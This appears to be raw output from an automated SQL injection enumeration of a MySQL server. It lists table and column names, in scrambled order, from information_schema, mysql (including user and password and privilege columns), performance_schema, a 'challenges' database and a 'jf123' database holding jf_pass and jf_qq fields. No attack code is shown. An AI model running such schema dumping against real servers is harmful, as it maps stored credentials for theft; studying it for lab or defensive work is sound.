the information_schema database PARAMETERS table the 1 column name  is:SPECIFIC_CATALOG
the information_schema database PARAMETERS table the 11 column name  is:NUMERIC_SCALE
the information_schema database PARAMETERS table the 14 column name  is:DTD_IDENTIFIER
the information_schema database PARTITIONS table the 1 column name  is:TABLE_CATALOG
the information_schema database PARAMETERS table the 4 column name  is:ORDINAL_POSITION
the information_schema database KEY_COLUMN_USAGE table the 11 column name  is:REFERENCED_TABLE_NAME
the information_schema database PARTITIONS table the 4 column name  is:PARTITION_NAME
the information_schema database KEY_COLUMN_USAGE table the 10 column name  is:REFERENCED_TABLE_SCHEMA
the information_schema database PARAMETERS table the 13 column name  is:COLLATION_NAME
the information_schema database PARAMETERS table the 12 column name  is:CHARACTER_SET_NAME
the information_schema database PARAMETERS table the 10 column name  is:NUMERIC_PRECISION
the information_schema database PARTITIONS table the 5 column name  is:SUBPARTITION_NAME
the information_schema database KEY_COLUMN_USAGE table the 12 column name  is:REFERENCED_COLUMN_NAME
the information_schema database PARTITIONS table the 15 column name  is:DATA_LENGTH
the information_schema database PARAMETERS table the 9 column name  is:CHARACTER_OCTET_LENGTH
the information_schema database PARTITIONS table the 20 column name  is:UPDATE_TIME
the information_schema database PARTITIONS table the 14 column name  is:AVG_ROW_LENGTH
the information_schema database PARTITIONS table the 17 column name  is:INDEX_LENGTH
the information_schema database PARTITIONS table the 21 column name  is:CHECK_TIME
the information_schema database PARTITIONS table the 16 column name  is:MAX_DATA_LENGTH
the information_schema database PARTITIONS table the 10 column name  is:PARTITION_EXPRESSION
the information_schema database PLUGINS table the 1 column name  is:PLUGIN_NAME
the information_schema database PARTITIONS table the 25 column name  is:TABLESPACE_NAME
the information_schema database PLUGINS table the 2 column name  is:PLUGIN_VERSION
the information_schema database PARTITIONS table the 6 column name  is:PARTITION_ORDINAL_POSITION
the information_schema database PARTITIONS table the 7 column name  is:SUBPARTITION_ORDINAL_POSITION
the information_schema database PARTITIONS table the 18 column name  is:DATA_FREE
the information_schema database PARTITIONS table the 22 column name  is:CHECKSUM
the information_schema database PARAMETERS table the 8 column name  is:CHARACTER_MAXIMUM_LENGTH
the information_schema database PARTITIONS table the 24 column name  is:NODEGROUP
the information_schema database PLUGINS table the 4 column name  is:PLUGIN_TYPE
the information_schema database PARTITIONS table the 11 column name  is:SUBPARTITION_EXPRESSION
the information_schema database PARTITIONS table the 23 column name  is:PARTITION_COMMENT
the information_schema database PARTITIONS table the 8 column name  is:PARTITION_METHOD
the information_schema database PARTITIONS table the 9 column name  is:SUBPARTITION_METHOD
the information_schema database PLUGINS table the 3 column name  is:PLUGIN_STATUS
the information_schema database PARTITIONS table the 13 column name  is:TABLE_ROWS
the information_schema database KEY_COLUMN_USAGE table the 9 column name  is:POSITION_IN_UNIQUE_CONSTRAINT
the information_schema database PARTITIONS table the 19 column name  is:CREATE_TIME
the information_schema database PARTITIONS table the 12 column name  is:PARTITION_DESCRIPTION
the information_schema database PROCESSLIST table the 4 column name  is:DB
the information_schema database PROCESSLIST table the 1 column name  is:ID
the information_schema database PROCESSLIST table the 2 column name  is:USER
the information_schema database PROCESSLIST table the 7 column name  is:STATE
the information_schema database PROCESSLIST table the 3 column name  is:HOST
the information_schema database PROCESSLIST table the 6 column name  is:TIME
the information_schema database PROCESSLIST table the 8 column name  is:INFO
the information_schema database PROCESSLIST table the 5 column name  is:COMMAND
the information_schema database ROUTINES table the 6 column name  is:DATA_TYPE
the information_schema database REFERENTIAL_CONSTRAINTS table the 8 column name  is:UPDATE_RULE
the information_schema database REFERENTIAL_CONSTRAINTS table the 10 column name  is:TABLE_NAME
the information_schema database REFERENTIAL_CONSTRAINTS table the 9 column name  is:DELETE_RULE
the information_schema database PLUGINS table the 11 column name  is:LOAD_OPTION
the information_schema database ROUTINES table the 4 column name  is:ROUTINE_NAME
the information_schema database ROUTINES table the 5 column name  is:ROUTINE_TYPE
the information_schema database PLUGINS table the 8 column name  is:PLUGIN_AUTHOR
the information_schema database PLUGINS table the 6 column name  is:PLUGIN_LIBRARY
the information_schema database PLUGINS table the 10 column name  is:PLUGIN_LICENSE
the information_schema database ROUTINES table the 2 column name  is:ROUTINE_CATALOG
the information_schema database PLUGINS table the 5 column name  is:PLUGIN_TYPE_VERSION
the information_schema database PLUGINS table the 9 column name  is:PLUGIN_DESCRIPTION
the information_schema database REFERENTIAL_CONSTRAINTS table the 11 column name  is:REFERENCED_TABLE_NAME
the information_schema database PLUGINS table the 7 column name  is:PLUGIN_LIBRARY_VERSION
the information_schema database ROUTINES table the 14 column name  is:ROUTINE_BODY
the information_schema database ROUTINES table the 16 column name  is:EXTERNAL_NAME
the information_schema database REFERENTIAL_CONSTRAINTS table the 7 column name  is:MATCH_OPTION
the information_schema database ROUTINES table the 3 column name  is:ROUTINE_SCHEMA
the information_schema database REFERENTIAL_CONSTRAINTS table the 2 column name  is:CONSTRAINT_SCHEMA
the information_schema database REFERENTIAL_CONSTRAINTS table the 1 column name  is:CONSTRAINT_CATALOG
the information_schema database ROUTINES table the 11 column name  is:CHARACTER_SET_NAME
the information_schema database REFERENTIAL_CONSTRAINTS table the 6 column name  is:UNIQUE_CONSTRAINT_NAME
the information_schema database REFERENTIAL_CONSTRAINTS table the 3 column name  is:CONSTRAINT_NAME
the information_schema database ROUTINES table the 13 column name  is:DTD_IDENTIFIER
the information_schema database ROUTINES table the 1 column name  is:SPECIFIC_NAME
the information_schema database ROUTINES table the 10 column name  is:NUMERIC_SCALE
the information_schema database ROUTINES table the 9 column name  is:NUMERIC_PRECISION
the information_schema database ROUTINES table the 12 column name  is:COLLATION_NAME
the information_schema database REFERENTIAL_CONSTRAINTS table the 5 column name  is:UNIQUE_CONSTRAINT_SCHEMA
the information_schema database ROUTINES table the 8 column name  is:CHARACTER_OCTET_LENGTH
the information_schema database REFERENTIAL_CONSTRAINTS table the 4 column name  is:UNIQUE_CONSTRAINT_CATALOG
the information_schema database ROUTINES table the 7 column name  is:CHARACTER_MAXIMUM_LENGTH
the information_schema database ROUTINES table the 23 column name  is:CREATED
the information_schema database ROUTINES table the 15 column name  is:ROUTINE_DEFINITION
the information_schema database SCHEMA_PRIVILEGES table the 1 column name  is:GRANTEE
the information_schema database SCHEMATA table the 5 column name  is:SQL_PATH
the information_schema database ROUTINES table the 21 column name  is:SQL_PATH
the information_schema database ROUTINES table the 27 column name  is:DEFINER
the information_schema database ROUTINES table the 25 column name  is:SQL_MODE
the information_schema database ROUTINES table the 24 column name  is:LAST_ALTERED
the information_schema database SCHEMATA table the 2 column name  is:SCHEMA_NAME
the information_schema database ROUTINES table the 22 column name  is:SECURITY_TYPE
the information_schema database SCHEMA_PRIVILEGES table the 5 column name  is:IS_GRANTABLE
the information_schema database SCHEMA_PRIVILEGES table the 3 column name  is:TABLE_SCHEMA
the information_schema database SCHEMA_PRIVILEGES table the 4 column name  is:PRIVILEGE_TYPE
the information_schema database ROUTINES table the 18 column name  is:PARAMETER_STYLE
the information_schema database ROUTINES table the 20 column name  is:SQL_DATA_ACCESS
the information_schema database SCHEMATA table the 1 column name  is:CATALOG_NAME
the information_schema database SESSION_STATUS table the 1 column name  is:VARIABLE_NAME
the information_schema database SCHEMA_PRIVILEGES table the 2 column name  is:TABLE_CATALOG
the information_schema database SESSION_STATUS table the 2 column name  is:VARIABLE_VALUE
the information_schema database SESSION_VARIABLES table the 1 column name  is:VARIABLE_NAME
the information_schema database SESSION_VARIABLES table the 2 column name  is:VARIABLE_VALUE
the information_schema database ROUTINES table the 19 column name  is:IS_DETERMINISTIC
the information_schema database STATISTICS table the 3 column name  is:TABLE_NAME
the information_schema database STATISTICS table the 12 column name  is:PACKED
the information_schema database STATISTICS table the 6 column name  is:INDEX_NAME
the information_schema database ROUTINES table the 17 column name  is:EXTERNAL_LANGUAGE
the information_schema database STATISTICS table the 1 column name  is:TABLE_CATALOG
the information_schema database ROUTINES table the 26 column name  is:ROUTINE_COMMENT
the information_schema database STATISTICS table the 2 column name  is:TABLE_SCHEMA
the information_schema database STATISTICS table the 11 column name  is:SUB_PART
the information_schema database STATISTICS table the 4 column name  is:NON_UNIQUE
the information_schema database STATISTICS table the 5 column name  is:INDEX_SCHEMA
the information_schema database STATISTICS table the 7 column name  is:SEQ_IN_INDEX
the information_schema database ROUTINES table the 30 column name  is:DATABASE_COLLATION
the information_schema database ROUTINES table the 28 column name  is:CHARACTER_SET_CLIENT
the information_schema database STATISTICS table the 8 column name  is:COLUMN_NAME
the information_schema database STATISTICS table the 15 column name  is:COMMENT
the information_schema database STATISTICS table the 14 column name  is:INDEX_TYPE
the information_schema database STATISTICS table the 13 column name  is:NULLABLE
the information_schema database TABLES table the 5 column name  is:ENGINE
the information_schema database TABLES table the 4 column name  is:TABLE_TYPE
the information_schema database STATISTICS table the 10 column name  is:CARDINALITY
the information_schema database STATISTICS table the 9 column name  is:COLLATION
the information_schema database TABLES table the 6 column name  is:VERSION
the information_schema database TABLES table the 3 column name  is:TABLE_NAME
the information_schema database SCHEMATA table the 4 column name  is:DEFAULT_COLLATION_NAME
the information_schema database SCHEMATA table the 3 column name  is:DEFAULT_CHARACTER_SET_NAME
the information_schema database TABLES table the 13 column name  is:DATA_FREE
the information_schema database TABLES table the 2 column name  is:TABLE_SCHEMA
the information_schema database TABLES table the 8 column name  is:TABLE_ROWS
the information_schema database ROUTINES table the 29 column name  is:COLLATION_CONNECTION
the information_schema database TABLES table the 1 column name  is:TABLE_CATALOG
the information_schema database TABLES table the 7 column name  is:ROW_FORMAT
the information_schema database TABLES table the 10 column name  is:DATA_LENGTH
the information_schema database STATISTICS table the 16 column name  is:INDEX_COMMENT
the information_schema database TABLES table the 16 column name  is:UPDATE_TIME
the information_schema database TABLESPACES table the 2 column name  is:ENGINE
the information_schema database TABLES table the 19 column name  is:CHECKSUM
the information_schema database TABLES table the 15 column name  is:CREATE_TIME
the information_schema database TABLES table the 17 column name  is:CHECK_TIME
the information_schema database TABLES table the 12 column name  is:INDEX_LENGTH
the information_schema database TABLES table the 9 column name  is:AVG_ROW_LENGTH
the information_schema database TABLES table the 11 column name  is:MAX_DATA_LENGTH
the information_schema database TABLE_PRIVILEGES table the 1 column name  is:GRANTEE
the information_schema database TABLESPACES table the 5 column name  is:EXTENT_SIZE
the information_schema database TABLES table the 14 column name  is:AUTO_INCREMENT
the information_schema database TABLESPACES table the 3 column name  is:TABLESPACE_TYPE
the information_schema database TABLES table the 20 column name  is:CREATE_OPTIONS
the information_schema database TABLES table the 21 column name  is:TABLE_COMMENT
the information_schema database TABLESPACES table the 1 column name  is:TABLESPACE_NAME
the information_schema database TABLESPACES table the 8 column name  is:NODEGROUP_ID
the information_schema database TABLESPACES table the 7 column name  is:MAXIMUM_SIZE
the information_schema database TABLE_CONSTRAINTS table the 5 column name  is:TABLE_NAME
the information_schema database TABLES table the 18 column name  is:TABLE_COLLATION
the information_schema database TABLE_CONSTRAINTS table the 4 column name  is:TABLE_SCHEMA
the information_schema database TABLE_PRIVILEGES table the 4 column name  is:TABLE_NAME
the information_schema database TABLESPACES table the 6 column name  is:AUTOEXTEND_SIZE
the information_schema database TABLE_PRIVILEGES table the 3 column name  is:TABLE_SCHEMA
the information_schema database TABLE_PRIVILEGES table the 6 column name  is:IS_GRANTABLE
the information_schema database TABLE_PRIVILEGES table the 5 column name  is:PRIVILEGE_TYPE
the information_schema database TABLE_PRIVILEGES table the 2 column name  is:TABLE_CATALOG
the information_schema database TABLESPACES table the 4 column name  is:LOGFILE_GROUP_NAME
the information_schema database TRIGGERS table the 3 column name  is:TRIGGER_NAME
the information_schema database TABLE_CONSTRAINTS table the 6 column name  is:CONSTRAINT_TYPE
the information_schema database TABLE_CONSTRAINTS table the 3 column name  is:CONSTRAINT_NAME
the information_schema database TRIGGERS table the 2 column name  is:TRIGGER_SCHEMA
the information_schema database TABLESPACES table the 9 column name  is:TABLESPACE_COMMENT
the information_schema database TABLE_CONSTRAINTS table the 2 column name  is:CONSTRAINT_SCHEMA
the information_schema database TRIGGERS table the 17 column name  is:CREATED
the information_schema database TRIGGERS table the 1 column name  is:TRIGGER_CATALOG
the information_schema database TRIGGERS table the 18 column name  is:SQL_MODE
the information_schema database TABLE_CONSTRAINTS table the 1 column name  is:CONSTRAINT_CATALOG
the information_schema database TRIGGERS table the 19 column name  is:DEFINER
the information_schema database USER_PRIVILEGES table the 1 column name  is:GRANTEE
the information_schema database TRIGGERS table the 8 column name  is:ACTION_ORDER
the information_schema database TRIGGERS table the 4 column name  is:EVENT_MANIPULATION
the information_schema database TRIGGERS table the 6 column name  is:EVENT_OBJECT_SCHEMA
the information_schema database VIEWS table the 7 column name  is:DEFINER
the information_schema database TRIGGERS table the 12 column name  is:ACTION_TIMING
the information_schema database TRIGGERS table the 10 column name  is:ACTION_STATEMENT
the information_schema database TRIGGERS table the 7 column name  is:EVENT_OBJECT_TABLE
the information_schema database TRIGGERS table the 5 column name  is:EVENT_OBJECT_CATALOG
the information_schema database VIEWS table the 3 column name  is:TABLE_NAME
the information_schema database USER_PRIVILEGES table the 4 column name  is:IS_GRANTABLE
the information_schema database INNODB_BUFFER_PAGE table the 3 column name  is:SPACE
the information_schema database USER_PRIVILEGES table the 3 column name  is:PRIVILEGE_TYPE
the information_schema database VIEWS table the 2 column name  is:TABLE_SCHEMA
the information_schema database VIEWS table the 6 column name  is:IS_UPDATABLE
the information_schema database TRIGGERS table the 9 column name  is:ACTION_CONDITION
the information_schema database INNODB_BUFFER_PAGE table the 1 column name  is:POOL_ID
the information_schema database USER_PRIVILEGES table the 2 column name  is:TABLE_CATALOG
the information_schema database VIEWS table the 1 column name  is:TABLE_CATALOG
the information_schema database INNODB_BUFFER_PAGE table the 2 column name  is:BLOCK_ID
the information_schema database VIEWS table the 8 column name  is:SECURITY_TYPE
the information_schema database TRIGGERS table the 11 column name  is:ACTION_ORIENTATION
the information_schema database INNODB_BUFFER_PAGE table the 5 column name  is:PAGE_TYPE
the information_schema database VIEWS table the 5 column name  is:CHECK_OPTION
the information_schema database TRIGGERS table the 20 column name  is:CHARACTER_SET_CLIENT
the information_schema database VIEWS table the 4 column name  is:VIEW_DEFINITION
the information_schema database INNODB_BUFFER_PAGE table the 8 column name  is:IS_HASHED
the information_schema database TRIGGERS table the 22 column name  is:DATABASE_COLLATION
the information_schema database INNODB_BUFFER_PAGE table the 6 column name  is:FLUSH_TYPE
the information_schema database INNODB_BUFFER_PAGE table the 4 column name  is:PAGE_NUMBER
the information_schema database INNODB_BUFFER_PAGE table the 19 column name  is:IS_OLD
the information_schema database INNODB_BUFFER_PAGE table the 15 column name  is:DATA_SIZE
the information_schema database INNODB_BUFFER_PAGE table the 7 column name  is:FIX_COUNT
the information_schema database TRIGGERS table the 15 column name  is:ACTION_REFERENCE_OLD_ROW
the information_schema database INNODB_BUFFER_PAGE table the 17 column name  is:PAGE_STATE
the information_schema database TRIGGERS table the 16 column name  is:ACTION_REFERENCE_NEW_ROW
the information_schema database INNODB_BUFFER_PAGE table the 18 column name  is:IO_FIX
the information_schema database TRIGGERS table the 14 column name  is:ACTION_REFERENCE_NEW_TABLE
the information_schema database INNODB_TRX table the 1 column name  is:trx_id
the information_schema database TRIGGERS table the 13 column name  is:ACTION_REFERENCE_OLD_TABLE
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the information_schema database INNODB_BUFFER_PAGE table the 13 column name  is:INDEX_NAME
the information_schema database INNODB_BUFFER_PAGE table the 11 column name  is:ACCESS_TIME
the information_schema database VIEWS table the 9 column name  is:CHARACTER_SET_CLIENT
the information_schema database TRIGGERS table the 21 column name  is:COLLATION_CONNECTION
the information_schema database INNODB_TRX table the 2 column name  is:trx_state
the information_schema database INNODB_BUFFER_PAGE table the 14 column name  is:NUMBER_RECORDS
the information_schema database INNODB_BUFFER_PAGE table the 16 column name  is:COMPRESSED_SIZE
the information_schema database INNODB_TRX table the 6 column name  is:trx_weight
the information_schema database INNODB_TRX table the 3 column name  is:trx_started
the information_schema database INNODB_TRX table the 8 column name  is:trx_query
the information_schema database VIEWS table the 10 column name  is:COLLATION_CONNECTION
the information_schema database INNODB_BUFFER_PAGE table the 20 column name  is:FREE_PAGE_CLOCK
the information_schema database INNODB_BUFFER_POOL_STATS table the 1 column name  is:POOL_ID
the information_schema database INNODB_BUFFER_PAGE table the 9 column name  is:NEWEST_MODIFICATION
the information_schema database INNODB_BUFFER_PAGE table the 10 column name  is:OLDEST_MODIFICATION
the information_schema database INNODB_BUFFER_POOL_STATS table the 2 column name  is:POOL_SIZE
the information_schema database INNODB_TRX table the 5 column name  is:trx_wait_started
the information_schema database INNODB_BUFFER_POOL_STATS table the 3 column name  is:FREE_BUFFERS
the information_schema database INNODB_BUFFER_POOL_STATS table the 4 column name  is:DATABASE_PAGES
the information_schema database INNODB_TRX table the 14 column name  is:trx_rows_locked
the information_schema database INNODB_TRX table the 10 column name  is:trx_tables_in_use
the information_schema database INNODB_TRX table the 12 column name  is:trx_lock_structs
the information_schema database INNODB_TRX table the 4 column name  is:trx_requested_lock_id
the information_schema database INNODB_TRX table the 18 column name  is:trx_unique_checks
the information_schema database INNODB_TRX table the 11 column name  is:trx_tables_locked
the information_schema database INNODB_TRX table the 9 column name  is:trx_operation_state
the information_schema database INNODB_TRX table the 7 column name  is:trx_mysql_thread_id
the information_schema database INNODB_BUFFER_POOL_STATS table the 8 column name  is:PENDING_READS
the information_schema database INNODB_TRX table the 15 column name  is:trx_rows_modified
the information_schema database INNODB_BUFFER_POOL_STATS table the 5 column name  is:OLD_DATABASE_PAGES
the information_schema database INNODB_TRX table the 17 column name  is:trx_isolation_level
the information_schema database INNODB_BUFFER_POOL_STATS table the 11 column name  is:PAGES_MADE_YOUNG
the information_schema database INNODB_BUFFER_POOL_STATS table the 7 column name  is:PENDING_DECOMPRESS
the information_schema database INNODB_TRX table the 13 column name  is:trx_lock_memory_bytes
the information_schema database INNODB_BUFFER_POOL_STATS table the 9 column name  is:PENDING_FLUSH_LRU
the information_schema database INNODB_BUFFER_POOL_STATS table the 6 column name  is:MODIFIED_DATABASE_PAGES
the information_schema database INNODB_TRX table the 19 column name  is:trx_foreign_key_checks
the information_schema database INNODB_TRX table the 16 column name  is:trx_concurrency_tickets
the information_schema database INNODB_BUFFER_POOL_STATS table the 22 column name  is:HIT_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 18 column name  is:PAGES_READ_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 10 column name  is:PENDING_FLUSH_LIST
the information_schema database INNODB_BUFFER_POOL_STATS table the 15 column name  is:NUMBER_PAGES_READ
the information_schema database INNODB_BUFFER_POOL_STATS table the 12 column name  is:PAGES_NOT_MADE_YOUNG
the information_schema database INNODB_TRX table the 21 column name  is:trx_adaptive_hash_latched
the information_schema database INNODB_TRX table the 22 column name  is:trx_adaptive_hash_timeout
the information_schema database INNODB_BUFFER_POOL_STATS table the 13 column name  is:PAGES_MADE_YOUNG_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 19 column name  is:PAGES_CREATE_RATE
the information_schema database INNODB_TRX table the 20 column name  is:trx_last_foreign_key_error
the information_schema database INNODB_BUFFER_POOL_STATS table the 27 column name  is:READ_AHEAD_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 21 column name  is:NUMBER_PAGES_GET
the information_schema database INNODB_BUFFER_POOL_STATS table the 16 column name  is:NUMBER_PAGES_CREATED
the information_schema database INNODB_BUFFER_POOL_STATS table the 20 column name  is:PAGES_WRITTEN_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 17 column name  is:NUMBER_PAGES_WRITTEN
the information_schema database INNODB_BUFFER_POOL_STATS table the 29 column name  is:LRU_IO_TOTAL
the information_schema database INNODB_BUFFER_POOL_STATS table the 14 column name  is:PAGES_MADE_NOT_YOUNG_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 30 column name  is:LRU_IO_CURRENT
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the information_schema database INNODB_BUFFER_POOL_STATS table the 25 column name  is:NUMBER_PAGES_READ_AHEAD
the information_schema database INNODB_LOCKS table the 1 column name  is:lock_id
the information_schema database INNODB_BUFFER_POOL_STATS table the 28 column name  is:READ_AHEAD_EVICTED_RATE
the information_schema database INNODB_BUFFER_POOL_STATS table the 31 column name  is:UNCOMPRESS_TOTAL
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the information_schema database INNODB_CMPMEM table the 4 column name  is:pages_free
the information_schema database INNODB_CMPMEM table the 3 column name  is:pages_used
the information_schema database INNODB_LOCK_WAITS table the 3 column name  is:blocking_trx_id
the information_schema database INNODB_BUFFER_POOL_STATS table the 32 column name  is:UNCOMPRESS_CURRENT
the information_schema database INNODB_BUFFER_POOL_STATS table the 26 column name  is:NUMBER_READ_AHEAD_EVICTED
the information_schema database INNODB_LOCK_WAITS table the 4 column name  is:blocking_lock_id
the information_schema database INNODB_LOCKS table the 3 column name  is:lock_mode
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the information_schema database INNODB_LOCKS table the 6 column name  is:lock_index
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the information_schema database INNODB_LOCKS table the 9 column name  is:lock_rec
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the information_schema database INNODB_CMP table the 3 column name  is:compress_ops_ok
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the information_schema database INNODB_LOCKS table the 7 column name  is:lock_space
the information_schema database INNODB_CMPMEM table the 2 column name  is:buffer_pool_instance
the information_schema database INNODB_LOCKS table the 10 column name  is:lock_data
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the information_schema database INNODB_CMP table the 6 column name  is:uncompress_time
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the information_schema database INNODB_CMP_RESET table the 1 column name  is:page_size
the challenges database kefgu88kuc table the 1 column name  is:id
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the information_schema database INNODB_CMPMEM_RESET table the 3 column name  is:pages_used
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the information_schema database INNODB_BUFFER_PAGE_LRU table the 19 column name  is:IS_OLD
the information_schema database INNODB_CMPMEM_RESET table the 5 column name  is:relocation_ops
the information_schema database INNODB_BUFFER_PAGE_LRU table the 15 column name  is:DATA_SIZE
the information_schema database INNODB_BUFFER_PAGE_LRU table the 18 column name  is:IO_FIX
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the challenges database kefgu88kuc table the 2 column name  is:sessid
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the information_schema database INNODB_CMP_RESET table the 6 column name  is:uncompress_time
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the jf123 database jf_content table the 9 column name  is:jf_qq
the jf123 database jf_content table the 3 column name  is:jf_child
the jf123 database jf_content table the 2 column name  is:jf_area
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the information_schema database INNODB_BUFFER_PAGE_LRU table the 14 column name  is:NUMBER_RECORDS
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the mysql database db table the 3 column name  is:User
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the jf123 database jf_content table the 13 column name  is:jf_pass
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the mysql database event table the 1 column name  is:db
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the mysql database columns_priv table the 6 column name  is:Timestamp
the mysql database event table the 2 column name  is:name
the mysql database columns_priv table the 5 column name  is:Column_name
the mysql database event table the 3 column name  is:body
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the mysql database db table the 4 column name  is:Select_priv
the mysql database db table the 10 column name  is:Grant_priv
the mysql database db table the 7 column name  is:Delete_priv
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the mysql database db table the 5 column name  is:Insert_priv
the mysql database db table the 6 column name  is:Update_priv
the mysql database db table the 8 column name  is:Create_priv
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the mysql database event table the 12 column name  is:ends
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the mysql database db table the 20 column name  is:Execute_priv
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the mysql database event table the 18 column name  is:time_zone
the mysql database help_category table the 4 column name  is:url
the mysql database db table the 19 column name  is:Alter_routine_priv
the mysql database help_category table the 2 column name  is:name
the mysql database event table the 22 column name  is:body_utf8
the mysql database event table the 6 column name  is:interval_value
the mysql database event table the 7 column name  is:interval_field
the mysql database event table the 10 column name  is:last_executed
the mysql database event table the 17 column name  is:originator
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the mysql database event table the 14 column name  is:on_completion
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the mysql database db table the 14 column name  is:Create_tmp_table_priv
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the mysql database help_topic table the 6 column name  is:url
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the mysql database general_log table the 2 column name  is:user_host
the mysql database host table the 1 column name  is:Host
the mysql database general_log table the 6 column name  is:argument
the mysql database general_log table the 4 column name  is:server_id
the mysql database help_topic table the 5 column name  is:example
the mysql database general_log table the 5 column name  is:command_type
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the mysql database host table the 3 column name  is:Select_priv
the mysql database host table the 6 column name  is:Delete_priv
the mysql database help_keyword table the 1 column name  is:help_keyword_id
the mysql database host table the 9 column name  is:Grant_priv
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the mysql database help_relation table the 2 column name  is:help_keyword_id
the mysql database host table the 12 column name  is:Alter_priv
the mysql database host table the 5 column name  is:Update_priv
the mysql database plugin table the 2 column name  is:dl
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the mysql database host table the 11 column name  is:Index_priv
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the mysql database ndb_binlog_index table the 1 column name  is:Position
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the mysql database help_topic table the 3 column name  is:help_category_id
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the mysql database proc table the 3 column name  is:type
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the mysql database host table the 16 column name  is:Show_view_priv
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the mysql database ndb_binlog_index table the 5 column name  is:updates
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the mysql database host table the 14 column name  is:Lock_tables_priv
the mysql database host table the 15 column name  is:Create_view_priv
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the mysql database proc table the 10 column name  is:returns
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the mysql database host table the 18 column name  is:Alter_routine_priv
the mysql database proc table the 5 column name  is:language
the mysql database procs_priv table the 3 column name  is:User
the mysql database proc table the 16 column name  is:comment
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the mysql database proc table the 4 column name  is:specific_name
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the mysql database servers table the 6 column name  is:Port
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the mysql database proc table the 19 column name  is:db_collation
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the mysql database slow_log table the 7 column name  is:db
the mysql database servers table the 7 column name  is:Socket
the mysql database procs_priv table the 8 column name  is:Timestamp
the mysql database proc table the 7 column name  is:is_deterministic
the mysql database procs_priv table the 4 column name  is:Routine_name
the mysql database servers table the 9 column name  is:Owner
the mysql database tables_priv table the 2 column name  is:Db
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the mysql database proc table the 6 column name  is:sql_data_access
the mysql database proxies_priv table the 5 column name  is:With_grant
the mysql database proxies_priv table the 7 column name  is:Timestamp
the mysql database servers table the 4 column name  is:Username
the mysql database servers table the 5 column name  is:Password
the mysql database servers table the 8 column name  is:Wrapper
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the mysql database servers table the 1 column name  is:Server_name
the mysql database tables_priv table the 3 column name  is:User
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the mysql database slow_log table the 2 column name  is:user_host
the mysql database proc table the 18 column name  is:collation_connection
the mysql database slow_log table the 1 column name  is:start_time
the mysql database slow_log table the 5 column name  is:rows_sent
the mysql database proc table the 17 column name  is:character_set_client
the mysql database slow_log table the 3 column name  is:query_time
the mysql database slow_log table the 11 column name  is:sql_text
the mysql database slow_log table the 9 column name  is:insert_id
the mysql database tables_priv table the 5 column name  is:Grantor
the mysql database time_zone_name table the 1 column name  is:Name
the mysql database slow_log table the 10 column name  is:server_id
the mysql database user table the 1 column name  is:Host
the mysql database tables_priv table the 4 column name  is:Table_name
the mysql database time_zone_transition_type table the 4 column name  is:Is_DST
the mysql database user table the 2 column name  is:User
the mysql database tables_priv table the 6 column name  is:Timestamp
the mysql database tables_priv table the 7 column name  is:Table_priv
the mysql database slow_log table the 6 column name  is:rows_examined
the mysql database time_zone_leap_second table the 2 column name  is:Correction
the mysql database time_zone_transition_type table the 3 column name  is:Offset
the mysql database slow_log table the 8 column name  is:last_insert_id
the mysql database time_zone table the 1 column name  is:Time_zone_id
the mysql database tables_priv table the 8 column name  is:Column_priv
the mysql database time_zone_name table the 2 column name  is:Time_zone_id
the mysql database time_zone_transition table the 1 column name  is:Time_zone_id
the mysql database user table the 3 column name  is:Password
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the mysql database time_zone_leap_second table the 1 column name  is:Transition_time
the mysql database time_zone_transition_type table the 5 column name  is:Abbreviation
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the mysql database user table the 4 column name  is:Select_priv
the mysql database time_zone_transition table the 2 column name  is:Transition_time
the mysql database user table the 7 column name  is:Delete_priv
the mysql database user table the 5 column name  is:Insert_priv
the mysql database user table the 6 column name  is:Update_priv
the mysql database user table the 8 column name  is:Create_priv
the mysql database time_zone table the 2 column name  is:Use_leap_seconds
the mysql database user table the 13 column name  is:File_priv
the mysql database user table the 10 column name  is:Reload_priv
the mysql database user table the 14 column name  is:Grant_priv
the mysql database user table the 17 column name  is:Alter_priv
the mysql database time_zone_transition table the 3 column name  is:Transition_type_id
the mysql database user table the 11 column name  is:Shutdown_priv
the mysql database user table the 16 column name  is:Index_priv
the mysql database time_zone_transition_type table the 2 column name  is:Transition_type_id
the mysql database user table the 18 column name  is:Show_db_priv
the mysql database user table the 19 column name  is:Super_priv
the mysql database user table the 12 column name  is:Process_priv
the mysql database user table the 22 column name  is:Execute_priv
the performance_schema database cond_instances table the 1 column name  is:NAME
the mysql database user table the 15 column name  is:References_priv
the mysql database user table the 30 column name  is:Event_priv
the mysql database user table the 33 column name  is:ssl_type
the mysql database user table the 41 column name  is:plugin
the mysql database user table the 26 column name  is:Show_view_priv
the performance_schema database events_waits_current table the 4 column name  is:SOURCE
the mysql database user table the 21 column name  is:Lock_tables_priv
the mysql database user table the 23 column name  is:Repl_slave_priv
the performance_schema database events_waits_current table the 2 column name  is:EVENT_ID
the mysql database user table the 34 column name  is:ssl_cipher
the performance_schema database events_waits_current table the 1 column name  is:THREAD_ID
the mysql database user table the 24 column name  is:Repl_client_priv
the mysql database user table the 35 column name  is:x509_issuer
the mysql database user table the 36 column name  is:x509_subject
the performance_schema database events_waits_current table the 8 column name  is:SPINS
the mysql database user table the 31 column name  is:Trigger_priv
the performance_schema database events_waits_current table the 3 column name  is:EVENT_NAME
the mysql database user table the 25 column name  is:Create_view_priv
the mysql database user table the 38 column name  is:max_updates
the performance_schema database events_waits_current table the 6 column name  is:TIMER_END
the mysql database user table the 37 column name  is:max_questions
the mysql database user table the 28 column name  is:Alter_routine_priv
the performance_schema database events_waits_current table the 5 column name  is:TIMER_START
the performance_schema database events_waits_current table the 16 column name  is:FLAGS
the mysql database user table the 20 column name  is:Create_tmp_table_priv
the mysql database user table the 29 column name  is:Create_user_priv
the mysql database user table the 27 column name  is:Create_routine_priv
the mysql database user table the 39 column name  is:max_connections
the performance_schema database events_waits_history table the 8 column name  is:SPINS
the performance_schema database events_waits_current table the 7 column name  is:TIMER_WAIT
the performance_schema database events_waits_history table the 4 column name  is:SOURCE
the performance_schema database events_waits_history table the 2 column name  is:EVENT_ID
the performance_schema database events_waits_history table the 1 column name  is:THREAD_ID
the performance_schema database events_waits_current table the 11 column name  is:OBJECT_TYPE
the performance_schema database events_waits_current table the 14 column name  is:OPERATION
the performance_schema database events_waits_current table the 10 column name  is:OBJECT_NAME
the performance_schema database events_waits_history table the 16 column name  is:FLAGS
the performance_schema database events_waits_history table the 6 column name  is:TIMER_END
